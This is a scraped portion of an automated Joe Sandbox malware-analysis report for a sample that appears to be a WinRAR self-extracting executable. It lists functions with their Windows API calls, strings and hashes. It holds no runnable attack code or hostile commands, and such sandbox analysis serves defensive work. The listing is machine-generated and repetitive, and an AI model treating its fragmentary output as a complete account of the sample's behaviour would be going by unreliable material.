Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: c1177eba373bc64c520e6b25b1527063a482f9a19c6a08a91adba76af361a30b
Instruction ID: 5a44593b2a71c0254d3f507d7340804f326df4130f6aafc9e42c5b45a572290a
Opcode Fuzzy Hash: c1177eba373bc64c520e6b25b1527063a482f9a19c6a08a91adba76af361a30b
Instruction Fuzzy Hash: 5FF0C472A0122AAACA206BA5DC4DEDB7E7DEF52791B048021F50BE2150DA64D586CAB0

Function 00DAD41C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000001), ref: 00DAD57B
GetDlgItemTextW.USER32(?,00000066,00001000,00000200), ref: 00DAD591
SetDlgItemTextW.USER32(?,00000067,?), ref: 00DAD5B9

Strings

GETPASSWORD1, xrefs: 00DAD548
Software\WinRAR SFX, xrefs: 00DAD466

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ItemText$Dialog
String ID: GETPASSWORD1$Software\WinRAR SFX
API String ID: 1770891597-1315819833
Opcode ID: 23a2370cd66f3a2a2f531767dab000114ed3ac71335e6d5811023a21c52f46b2
Instruction ID: 15667a618ffb2d830eb9e497f486d0ba62406c5fdb9307d5cf6ae9376f875be7
Opcode Fuzzy Hash: 23a2370cd66f3a2a2f531767dab000114ed3ac71335e6d5811023a21c52f46b2
Instruction Fuzzy Hash: 2341B172904209ABEB30AB64DC45FFE77ADEB4A304F14442AF60AE7581DB70A9448B75

Function 00D9E033 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00DA2663: _wcslen.LIBCMT ref: 00DA2669

Part of subcall function 00D9D848: _wcsrchr.LIBVCRUNTIME ref: 00D9D85F

_wcslen.LIBCMT ref: 00D9E105
_wcslen.LIBCMT ref: 00D9E14D

Strings

.exe, xrefs: 00D9E079
.sfx, xrefs: 00D9E088
.rar, xrefs: 00D9E04F, 00D9E0A2

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 4167488d2dbb71d591faccbd857205b17b061437e8d3390a603c58952b1bbe4c
Instruction ID: 19561a1f09196bc9e356787c96f01c51b438ee1c58d7c36eff1c29292f69d66e
Opcode Fuzzy Hash: 4167488d2dbb71d591faccbd857205b17b061437e8d3390a603c58952b1bbe4c
Instruction Fuzzy Hash: 15412422500B1199CF32EF34C846F7BB7A9EF45B54B18490EF8C9AB181E7A19D81C375

Function 00D9DA1E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00D9DA59
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00D9BD19,?,?,00000800,?,?,?,00D9BCD4), ref: 00D9DB02
_wcslen.LIBCMT ref: 00D9DB70

Strings

\\?\, xrefs: 00D9DA90, 00D9DADC, 00D9DB38, 00D9DB87
UNC, xrefs: 00D9DAE8

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 8a61fcf4b56853937524f0e333548f2447325e73f16b05a7bb984f420c191ac5
Instruction ID: 8ac61926a0391ac9498d8ceda9a5c451d618f72753d07504cec096fc3630f51c
Opcode Fuzzy Hash: 8a61fcf4b56853937524f0e333548f2447325e73f16b05a7bb984f420c191ac5
Instruction Fuzzy Hash: 6F418F36504381AADF20AB608C81EFFB3BEEF5A744F090869F58493141E7A8DD85C672

Function 00D9BD61 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00D9BD93
_wcslen.LIBCMT ref: 00D9BDB6
_wcslen.LIBCMT ref: 00D9BE4C
_wcslen.LIBCMT ref: 00D9BEB1

Part of subcall function 00D9C37A: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,00D987BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 00D9C3A5

Part of subcall function 00D9BBFF: RemoveDirectoryW.KERNEL32(00000001,?,00000001,00000000), ref: 00D9BC1C
Part of subcall function 00D9BBFF: RemoveDirectoryW.KERNEL32(?,00000001,?,00000800), ref: 00D9BC48

Strings

vC`, xrefs: 00D9BE6A

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _wcslen$DirectoryRemove$CloseFind
String ID: vC`
API String ID: 973666142-1023373374
Opcode ID: 4119b87f658b5539263730f7b12261304471c01d406c8193558c533f0fcb8ee3
Instruction ID: c6c9a98b5a0bd9a20701cf55cab7fbfed1a4b9f902ef0c6fee3495f110ce13c7
Opcode Fuzzy Hash: 4119b87f658b5539263730f7b12261304471c01d406c8193558c533f0fcb8ee3
Instruction Fuzzy Hash: E841C27250879096CF30AB64A9459FBB3EDDF84310F46481FFA8A93141EB74D988C6B1

Function 00DAD9DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00DAD9ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00DADA12
DeleteObject.GDI32(00000000), ref: 00DADA44
DeleteObject.GDI32(00000000), ref: 00DADA67

Part of subcall function 00DAC652: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00DADA3D,00000066), ref: 00DAC665
Part of subcall function 00DAC652: SizeofResource.KERNEL32(00000000,?,?,?,00DADA3D,00000066), ref: 00DAC67C
Part of subcall function 00DAC652: LoadResource.KERNEL32(00000000,?,?,?,00DADA3D,00000066), ref: 00DAC693
Part of subcall function 00DAC652: LockResource.KERNEL32(00000000,?,?,?,00DADA3D,00000066), ref: 00DAC6A2
Part of subcall function 00DAC652: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00DADA3D,00000066), ref: 00DAC6BD
Part of subcall function 00DAC652: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00DADA3D,00000066), ref: 00DAC6CE
Part of subcall function 00DAC652: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00DAC737
Part of subcall function 00DAC652: GlobalUnlock.KERNEL32(00000000), ref: 00DAC756
Part of subcall function 00DAC652: GlobalFree.KERNEL32(00000000), ref: 00DAC75D

Strings

], xrefs: 00DADA1A

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: 7d4d2b808e60a872e59c048e0ac8d137e7ceca118ed8c8d8b4f170a5e22f20fc
Instruction ID: 17320b53590edf9c4105711243409d90f2592193d0650e21d8981a3a07cf2c24
Opcode Fuzzy Hash: 7d4d2b808e60a872e59c048e0ac8d137e7ceca118ed8c8d8b4f170a5e22f20fc
Instruction Fuzzy Hash: BA01DE329443056BCB12A7649C0AABF3A7AEF83B61F180010F805E7395DF31CC1686B0

Function 00DAF950 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00D91366: GetDlgItem.USER32(00000000,00003021), ref: 00D913AA
Part of subcall function 00D91366: SetWindowTextW.USER32(00000000,00DC65F4), ref: 00D913C0

EndDialog.USER32(?,00000001), ref: 00DAF99B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00DAF9B1
SetDlgItemTextW.USER32(?,00000066,?), ref: 00DAF9C5
SetDlgItemTextW.USER32(?,00000068), ref: 00DAF9D4

Strings

RENAMEDLG, xrefs: 00DAF968

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: f20e22ec262b0e75d3d80808d9d6552d4bd9539dbbb6d34fc04603fc4af1be37
Instruction ID: 82b5b40847fa7309a5f9580213c1c7d2cc4b1bd1b6d85d36cbcf3200cff3c97d
Opcode Fuzzy Hash: f20e22ec262b0e75d3d80808d9d6552d4bd9539dbbb6d34fc04603fc4af1be37
Instruction Fuzzy Hash: 4401F1332843107AE2114BA89C09FBBBB6CFB5A701F158465F341E22A0C662DA05CB75

Function 00DBA6C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00DBA676,?,?,00DBA616,?,00DCF7B0,0000000C,00DBA76D,?,00000002), ref: 00DBA6E5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DBA6F8
FreeLibrary.KERNEL32(00000000,?,?,?,00DBA676,?,?,00DBA616,?,00DCF7B0,0000000C,00DBA76D,?,00000002,00000000), ref: 00DBA71B

Strings

mscoree.dll, xrefs: 00DBA6DE
CorExitProcess, xrefs: 00DBA6F0

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 36c62e6e1b18a3bae340caa7d4625ca099e701828ccf137d3eb6d292aba865d1
Instruction ID: f487ff077f4d768b5eb6e4e4e6ecd0cee75c5517c873769b82760f00049fd1fc
Opcode Fuzzy Hash: 36c62e6e1b18a3bae340caa7d4625ca099e701828ccf137d3eb6d292aba865d1
Instruction Fuzzy Hash: 2CF03C30A1520AFBDB119FA4DC59FADBBB9EB08711F044169B806A22A0CB719D41DAB1

Function 00DA12F6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00DA28AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DA28D4
Part of subcall function 00DA28AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DA1309,Crypt32.dll,00000000,00DA1383,00000200,?,00DA1366,00000000,00000000,?), ref: 00DA28F4

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00DA1315
GetProcAddress.KERNEL32(00DDC1F0,CryptUnprotectMemory), ref: 00DA1325

Strings

CryptProtectMemory, xrefs: 00DA130F
CryptUnprotectMemory, xrefs: 00DA131B
Crypt32.dll, xrefs: 00DA12FF

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: bd8ba01629f284bd6f53d586f410a34873b3794d09ddb17fbc0be417473acd60
Instruction ID: 894ea370582c5a74acda2d6904491ee8b2a003facc3777e4b8170f5b942bdc5b
Opcode Fuzzy Hash: bd8ba01629f284bd6f53d586f410a34873b3794d09ddb17fbc0be417473acd60
Instruction Fuzzy Hash: 2EE08674A407039EDB215F349909F427FE59F25700F04C81DF0D6E3650D6B4D8858B30

Function 00DB51FA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00DB52C1
___AdjustPointer.LIBCMT ref: 00DB52E4
_abort.LIBCMT ref: 00DB5332
___AdjustPointer.LIBCMT ref: 00DB5380

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 3ad7277bc24926a3da92e1d3c99d77e982488e0426912bd86396bfd2e71dcb53
Instruction ID: 91706d33f67966bce747ff5e59486ad0ff3f64ed1817667e493e5a074e3529c4
Opcode Fuzzy Hash: 3ad7277bc24926a3da92e1d3c99d77e982488e0426912bd86396bfd2e71dcb53
Instruction Fuzzy Hash: 0D51AE72A01A06DFDB299F54E881BEAB3A4EF44750F18452DE847873A9D771EC41CBB0

Function 00DBE580 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00DBE589
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DBE5AC

Part of subcall function 00DBBC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DB6A24,?,0000015D,?,?,?,?,00DB7F00,000000FF,00000000,?,?), ref: 00DBBCC0

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DBE5D2
_free.LIBCMT ref: 00DBE5E5
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DBE5F4

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 1359642046e4e07d5846b18e7185945a794405f33baaf5d50d92f0acc720086e
Instruction ID: 504abccf6a05a40e543574e8948dd51016d93568c478b54b629c6046aeca43e1
Opcode Fuzzy Hash: 1359642046e4e07d5846b18e7185945a794405f33baaf5d50d92f0acc720086e
Instruction Fuzzy Hash: B7018472601716BF273196765C89CFB6BADEEC6B653680129B906D7205FF61CD0181B0

Function 00DBBA29 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00DBBC80,00DBD7D8,?,00DBB9D3,00000001,00000364,?,00DB688D,?,?,00DD50C4), ref: 00DBBA2E
_free.LIBCMT ref: 00DBBA63
_free.LIBCMT ref: 00DBBA8A
SetLastError.KERNEL32(00000000,?,00DD50C4), ref: 00DBBA97
SetLastError.KERNEL32(00000000,?,00DD50C4), ref: 00DBBAA0

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: a03a8bc4a4e3e2ca86c517404d05e8d42ab546a22f39414f2bec5b31648b938f
Instruction ID: 3aea30abd75d69eb0c22857d66ebdb7ded360ec0c712dc2fa029bed6b95f4892
Opcode Fuzzy Hash: a03a8bc4a4e3e2ca86c517404d05e8d42ab546a22f39414f2bec5b31648b938f
Instruction Fuzzy Hash: C501D136A05702EB8216A7755C86DEA266EDFC17757250026F507E2291EFE1CC05A170

Function 00DA2FC9 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00DA32AF: ResetEvent.KERNEL32(?), ref: 00DA32C1
Part of subcall function 00DA32AF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00DA32D5

ReleaseSemaphore.KERNEL32(?,00000040,00000000,E7604376,?,?,00000001,?,00DC52FF,000000FF,?,00DA43C0,?,00000000,?,00D94766), ref: 00DA3007
CloseHandle.KERNEL32(?,?,?,00DA43C0,?,00000000,?,00D94766,?,?,?,00000000,?,?,?,00000001), ref: 00DA3021
DeleteCriticalSection.KERNEL32(?,?,00DA43C0,?,00000000,?,00D94766,?,?,?,00000000,?,?,?,00000001,?), ref: 00DA303A
CloseHandle.KERNEL32(?,?,00DA43C0,?,00000000,?,00D94766,?,?,?,00000000,?,?,?,00000001,?), ref: 00DA3046
CloseHandle.KERNEL32(?,?,00DA43C0,?,00000000,?,00D94766,?,?,?,00000000,?,?,?,00000001,?), ref: 00DA3052

Part of subcall function 00DA30CA: WaitForSingleObject.KERNEL32(?,000000FF,00DA31E7,?,?,00DA325F,?,?,?,?,?,00DA3249), ref: 00DA30D0
Part of subcall function 00DA30CA: GetLastError.KERNEL32(?,?,00DA325F,?,?,?,?,?,00DA3249), ref: 00DA30DC

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: c9e065bfc9d620f2746bf5b22e7eb43264651d60ef8ba8fd6013e89cf24469ee
Instruction ID: 6b475ab1fcc4ca4c410e65973f10fda29dc8302f819a6756bf8b7339d9946ef7
Opcode Fuzzy Hash: c9e065bfc9d620f2746bf5b22e7eb43264651d60ef8ba8fd6013e89cf24469ee
Instruction Fuzzy Hash: 07116172500745EFC7229F64DC84FC6FBAAFB08710F00092AF166A2260CB75AA449B74

Function 00DBEE4F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00DBEE67

Part of subcall function 00DBBAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?), ref: 00DBBB10
Part of subcall function 00DBBAFA: GetLastError.KERNEL32(?,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?,?), ref: 00DBBB22

_free.LIBCMT ref: 00DBEE79
_free.LIBCMT ref: 00DBEE8B
_free.LIBCMT ref: 00DBEE9D
_free.LIBCMT ref: 00DBEEAF

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d7c31b2e415fca4c522fb74fbd6926d540a2829c740f2e49c34b2bdf9bc7cc43
Instruction ID: 69c607d81ac9a462382217b50209eba83ba2270f098b56dc69b3b3418dc8e2b7
Opcode Fuzzy Hash: d7c31b2e415fca4c522fb74fbd6926d540a2829c740f2e49c34b2bdf9bc7cc43
Instruction Fuzzy Hash: E3F0AF72905310EFC664EB69E585CDA77EAFA10720B590806F44FD7651CBF0FC808A74

Function 00DBB160 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DBB17E

Part of subcall function 00DBBAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?), ref: 00DBBB10
Part of subcall function 00DBBAFA: GetLastError.KERNEL32(?,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?,?), ref: 00DBBB22

_free.LIBCMT ref: 00DBB190
_free.LIBCMT ref: 00DBB1A3
_free.LIBCMT ref: 00DBB1B4
_free.LIBCMT ref: 00DBB1C5

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
